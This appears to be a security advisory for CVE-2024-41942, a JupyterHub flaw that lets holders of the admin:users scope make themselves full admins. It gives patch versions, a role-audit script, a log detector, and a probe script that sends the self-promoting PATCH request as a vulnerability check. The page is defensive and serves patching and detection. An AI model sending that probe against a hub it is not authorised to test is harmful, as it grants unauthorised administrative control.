CVE-2024-41942
📋 TL;DR
In JupyterHub releases before 4.1.6 on the 4.x branch and before 5.1.0 on the 5.x branch (so every 5.0.x release is affected), a user who holds the admin:users scope can make themselves a full administrator. The scope is meant to let its holder manage other accounts through the Hub REST API, but the user-modification call also accepts the admin flag, so a scoped user can set admin=true on their own account and thereby receive every scope the Hub defines. The impact is limited because admin:users is already a highly privileged scope that in practice is granted only to trusted users; in effect the scope was equivalent to admin=true, which was never intended.
💻 Affected Systems
- JupyterHub
📦 What is this software?
JupyterHub, by Project Jupyter: a multi-user hub that spawns, manages and proxies single-user Jupyter notebook servers, with role-based access control expressed as scopes (such as admin:users) that are granted through roles.
⚠️ Risk & Real-World Impact
Worst Case
A user holding admin:users sets admin=true on their own account and thereby gains every scope the Hub defines: creating, modifying and deleting any account, managing other users' tokens, starting and accessing other users' servers, and shutting down the Hub. The whole multi-user environment is compromised.
Likely Case
Low in most deployments: admin:users is rarely granted to anyone who is not already trusted with full administration, and most operators already treat the scope as equivalent to admin. The realistic exposure is a deployment that deliberately delegated account management (for example to teaching staff or a provisioning service) on the assumption that the delegate could not promote themselves.
If Mitigated
No impact if admin:users is granted only to fully trusted administrators, as intended, or once the Hub runs a fixed release.
🎯 Exploit Status
Exploitation requires an authenticated token for an account that already holds admin:users. Given that, it is a single REST call (a PATCH to the user's own record setting admin to true), so the difficulty lies entirely in obtaining the scope, not in using it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.1.6 or 5.1.0
Vendor Advisory: https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-9x4q-3gxw-849f
Restart Required: Yes
Instructions:
1. Upgrade JupyterHub to 4.1.6 (4.x branch) or 5.1.0 (5.x branch) with the package manager you deploy it with (pip or conda on a host install; a hub image that ships one of these releases for container and Helm deployments).
2. Restart the JupyterHub service so the new code is loaded.
3. Verify the upgrade: jupyterhub --version must report 4.1.6 or later on 4.x, or 5.1.0 or later on 5.x.
🔧 Temporary Workarounds
Remove admin:users scope from non-admin users
Revoke admin:users from every user, group and service that should not have full administrative privileges. In JupyterHub the scope is granted through roles: the built-in admin role (for users with admin=true) and any custom roles defined in c.JupyterHub.load_roles in jupyterhub_config.py. Filtered grants (admin:users!group=...) count too.
# Review c.JupyterHub.load_roles in jupyterhub_config.py for any role whose scopes include admin:users, filtered or not
# Check which users, groups and services those roles are assigned to, remove the scope or the assignment, and restart the Hub so the role definitions are reloaded
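The audit below is an added example, not code from the JupyterHub project: it walks the same list of role dicts you would assign to c.JupyterHub.load_roles and reports every principal that receives admin:users (including filtered grants) without being in the intended admin set, then returns a hardened copy of the roles with the scope stripped. The admin set and the sample roles are constructed for illustration.

```python
"""Audit JupyterHub role definitions for admin:users grants.

Added example, not JupyterHub project code. It inspects the same list of role
dicts you would assign to c.JupyterHub.load_roles in jupyterhub_config.py
(keys: name, scopes, users, groups, services) and reports every principal that
receives admin:users without being a declared admin. ADMIN_USERS and the
sample roles below are constructed for illustration.
"""

ADMIN_USERS = {"alice"}  # constructed: the accounts that are meant to be full admins

# Constructed sample: what a jupyterhub_config.py might set c.JupyterHub.load_roles to.
SAMPLE_LOAD_ROLES = [
    {
        "name": "user-manager",
        "scopes": ["admin:users", "list:users"],
        "users": ["alice", "ta-bob"],
    },
    {
        "name": "course-staff",
        # A filtered grant is still admin:users; it is reported like any other.
        "scopes": ["admin:users!group=students"],
        "groups": ["staff"],
    },
    {
        "name": "dashboard",
        "scopes": ["list:users", "read:users"],
        "services": ["grafana"],
    },
]


def base_scope(scope: str) -> str:
    """Strip a JupyterHub scope filter ('admin:users!group=x' -> 'admin:users')."""
    return scope.split("!", 1)[0]


def grants_admin_users(role: dict) -> list:
    """Return the scopes in a role that amount to admin:users (filtered or not)."""
    return [s for s in role.get("scopes", []) if base_scope(s) == "admin:users"]


def audit_roles(load_roles: list, admin_users: set) -> list:
    """List (role, principal_kind, principal, scope) for every non-admin grant.

    Groups and services are always reported: group membership is not known from
    the config alone, and a service holding admin:users is as exposed as a user.
    """
    findings = []
    for role in load_roles:
        for scope in grants_admin_users(role):
            for user in role.get("users", []):
                if user not in admin_users:
                    findings.append((role["name"], "user", user, scope))
            for group in role.get("groups", []):
                findings.append((role["name"], "group", group, scope))
            for service in role.get("services", []):
                findings.append((role["name"], "service", service, scope))
    return findings


def hardened_roles(load_roles: list) -> list:
    """Return a copy of the roles with admin:users removed from every custom role.

    Full admins keep the scope through the built-in admin role, so nothing is
    lost for them; a custom role left with no scopes grants nothing and is dropped.
    """
    out = []
    for role in load_roles:
        kept = [s for s in role.get("scopes", []) if base_scope(s) != "admin:users"]
        if kept:
            out.append({**role, "scopes": kept})
    return out


if __name__ == "__main__":
    for finding in audit_roles(SAMPLE_LOAD_ROLES, ADMIN_USERS):
        print("admin:users granted outside the admin set:", finding)
    for role in hardened_roles(SAMPLE_LOAD_ROLES):
        print(role["name"], "->", role["scopes"])
```

Feed it your real load_roles list and the set of accounts that are supposed to be admins; anything it reports is a principal that, on an unpatched Hub, can make itself admin. Removing the scope only takes effect after the Hub is restarted.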
🧯 If You Can't Patch
- Review all user accounts and ensure admin:users scope is only granted to fully trusted administrators.
- Monitor for privilege changes: compare the admin flag reported by GET /hub/api/users (or the users table) against the expected admin list on a schedule, and review the Hub log for PATCH /hub/api/users/<name> requests from non-admin accounts.
🔍 How to Verify
Check if Vulnerable:
Run jupyterhub --version on the Hub host (or inside the hub container). Any 4.x release below 4.1.6, any 5.0.x release, and any 2.x or 3.x release is affected. Then list which users, groups and services hold admin:users (roles defined in c.JupyterHub.load_roles; the user model returned by GET /hub/api/users lists each user's roles) and compare that with the intended admin set.
Check Version:
jupyterhub --version
Verify Fix Applied:
Confirm that jupyterhub --version reports 4.1.6 or later on the 4.x branch, or 5.1.0 or later on the 5.x branch. Then, with a throwaway test account that has admin:users but admin=false, send PATCH /hub/api/users/<that account> with body {"admin": true}: a fixed Hub refuses the request, while a vulnerable one answers 200 and the account becomes admin (revert the flag immediately).
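The script below is an added example, not part of JupyterHub, that does both checks: a branch-aware version test (5.0.x is newer than 4.1.6 yet still affected, and a pre-release such as 5.1.0b1 does not count as fixed) and the probe request a scoped test account would send to try to grant itself admin. The Hub API URL, token and username are assumed to come from the environment variables HUB_API_URL, HUB_TOKEN and HUB_USER; those names are this example's choice, not a JupyterHub convention.

```python
"""Check whether a JupyterHub release carries the fix, and probe a live hub.

Added example, not part of JupyterHub. The fixed releases are the ones in this
advisory: 4.1.6 on the 4.x branch and 5.1.0 on the 5.x branch. Anything older
than 4.1.6, including every 5.0.x release, is treated as affected. The probe
sends the request an attacker would send, so run it only against a hub you
own, with a throwaway account: on an unpatched hub it really does grant admin.
Assumed: the token belongs to a user that holds admin:users with admin=false.
"""
import json
import re
import urllib.error
import urllib.request

# First fixed release per major version, from the advisory.
FIXED_BY_MAJOR = {4: (4, 1, 6), 5: (5, 1, 0)}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(.*)$")


def version_key(version: str):
    """Turn '5.1.0' or '5.1.0b1' into a sortable tuple.

    Anything after the numeric triple marks a pre-release, which sorts before
    the final release of the same number, so '5.1.0b1' is not counted as fixed.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised JupyterHub version: {version!r}")
    major, minor, patch = (int(m.group(i)) for i in range(1, 4))
    is_final = 0 if m.group(4) else 1
    return (major, minor, patch, is_final)


def is_fixed(version: str) -> bool:
    """True if this release contains the CVE-2024-41942 fix."""
    key = version_key(version)
    major = key[0]
    if major in FIXED_BY_MAJOR:
        return key >= FIXED_BY_MAJOR[major] + (1,)
    # 2.x and 3.x predate the fix entirely; later majors are assumed to carry it.
    return major > max(FIXED_BY_MAJOR)


def build_probe_request(hub_api_url: str, token: str, username: str):
    """Build PATCH /users/{username} with {"admin": true}, sent as that user."""
    url = f"{hub_api_url.rstrip('/')}/users/{username}"
    body = json.dumps({"admin": True}).encode()
    return urllib.request.Request(
        url,
        data=body,
        method="PATCH",
        headers={"Authorization": f"token {token}", "Content-Type": "application/json"},
    )


def interpret_probe(status: int) -> str:
    """Map the HTTP status of the probe to a verdict."""
    if 200 <= status < 300:
        return "VULNERABLE: the scoped user set admin=true on itself; revert it now"
    if status == 403:
        return "rejected: the hub refused to grant admin (fixed behaviour, or the token lacks the scope)"
    if status == 404:
        return "inconclusive: wrong API URL or username"
    return f"inconclusive: HTTP {status}"


def run_probe(hub_api_url: str, token: str, username: str, timeout: float = 10.0) -> int:
    """Send the probe and return the HTTP status (needs network access to the hub)."""
    req = build_probe_request(hub_api_url, token, username)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


if __name__ == "__main__":
    import os
    import subprocess

    try:
        installed = subprocess.run(
            ["jupyterhub", "--version"], capture_output=True, text=True, check=True
        ).stdout.strip()
        print(installed, "fixed" if is_fixed(installed) else "AFFECTED")
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("jupyterhub not on PATH; pass the version string to is_fixed() yourself")
    if os.environ.get("HUB_API_URL"):
        status = run_probe(os.environ["HUB_API_URL"], os.environ["HUB_TOKEN"], os.environ["HUB_USER"])
        print(status, interpret_probe(status))
```

Before trusting a 403 as proof of the fix, confirm the token works at all (for example with a GET of the same /users/<name> URL), since an invalid token is also refused. A 200 means the test account is now an admin: have a real admin PATCH it back to {"admin": false} straight away.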
📡 Detection & Monitoring
Log Indicators:
- Hub request log lines of the form 200 PATCH /hub/api/users/<name> (<name>@<ip>) where the requesting user and the target are the same non-admin account; the JSON body (which carries "admin": true) is not logged, so corroborate against the admin flag in GET /hub/api/users
- Unexpected administrative actions (user creation or deletion, token management, server starts for other users) from accounts not previously designated as full admins
Network Indicators:
- PATCH requests to /hub/api/users/<name> (and POST requests that create users) from clients that are not admin workstations or provisioning systems; the admin flag travels in the JSON body, so it is only visible where TLS is terminated
SIEM Query:
Search the Hub request log for method PATCH with a URI matching /hub/api/users/<name> where the requesting user is not in the admin allowlist, and raise the severity when the requester equals the target. The access log never contains the string 'admin:users', so do not key the search on the scope name; instead, on a schedule, diff the admin flags reported by GET /hub/api/users against the expected set.
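The detector below is an added example, not part of JupyterHub or of any SIEM product. It runs the search described above over constructed log lines shaped like the Hub's request log (status, method, URI, then the requesting user and IP in parentheses; check this against your own Hub's format before relying on the regex). Because the body is not logged, it flags the endpoint that carries the admin flag, PATCH /hub/api/users/<name>, whenever the caller is not a known admin, and treats caller == target as the CVE-2024-41942 pattern, including refused attempts on a patched Hub.

```python
"""Flag suspicious user-modification calls in JupyterHub access logs.

Added example, not part of JupyterHub or of any SIEM. The lines below are
constructed to follow the shape of the Hub's request log
('[<level> <time> JupyterHub log:<n>] <status> <method> <uri> (<user>@<ip>) <ms>ms');
verify the format against real logs before using LINE_RE in production.
"""
import re

KNOWN_ADMINS = {"alice"}  # constructed allowlist; populate it from GET /hub/api/users (admin == true)

# Constructed sample log lines.
SAMPLE_LOG = """\
[I 2024-08-12 10:15:02.123 JupyterHub log:192] 200 GET /hub/api/users (alice@10.0.0.2) 3.01ms
[I 2024-08-12 10:15:09.456 JupyterHub log:192] 200 PATCH /hub/api/users/bob (bob@10.0.0.5) 4.17ms
[I 2024-08-12 10:16:21.789 JupyterHub log:192] 200 PATCH /hub/api/users/carol (alice@10.0.0.2) 3.88ms
[W 2024-08-12 10:17:40.001 JupyterHub log:192] 403 PATCH /hub/api/users/dave (dave@10.0.0.9) 1.20ms
[I 2024-08-12 10:18:05.555 JupyterHub log:192] 200 PATCH /hub/api/users/erin (bob@10.0.0.5) 2.75ms
"""

LINE_RE = re.compile(
    r"\[(?P<level>[A-Z]) (?P<ts>\S+ \S+) JupyterHub [^\]]*\] "
    r"(?P<status>\d{3}) (?P<method>[A-Z]+) (?P<uri>\S+) "
    r"\((?P<user>[^@)]+)@(?P<ip>[^)]+)\)"
)
USER_URI_RE = re.compile(r"^/hub/api/users/(?P<target>[^/?]+)$")


def parse_line(line: str):
    """Return the request fields of one log line as a dict, or None if it is not a request line."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None


def classify(event: dict, admins: set):
    """Return (severity, reason) for one parsed request, or None if benign."""
    if event["method"] != "PATCH":
        return None
    m = USER_URI_RE.match(event["uri"])
    if not m:
        return None
    actor, target, status = event["user"], m.group("target"), int(event["status"])
    if actor in admins:
        return None  # admins are expected to edit accounts
    if actor == target:
        if 200 <= status < 300:
            return ("high", f"{actor} modified their own account (possible admin=true); check GET /hub/api/users/{actor}")
        return ("medium", f"{actor} attempted a self-modification and was refused ({status})")
    if 200 <= status < 300:
        return ("medium", f"non-admin {actor} modified {target}; verify {target}'s admin flag")
    return None


def scan(log_text: str, admins: set) -> list:
    """Run classify() over every line; return (timestamp, severity, reason) triples."""
    findings = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        verdict = classify(event, admins)
        if verdict:
            findings.append((event["ts"], verdict[0], verdict[1]))
    return findings


if __name__ == "__main__":
    for ts, sev, reason in scan(SAMPLE_LOG, KNOWN_ADMINS):
        print(ts, sev.upper(), reason)
```

The second medium finding (a non-admin editing a different account) matters because an attacker who has already promoted themselves, or who holds admin:users legitimately, can just as well set the flag on a second account they control; the same rule can be extended to the account-creation calls (POST /hub/api/users), which also accept an admin field.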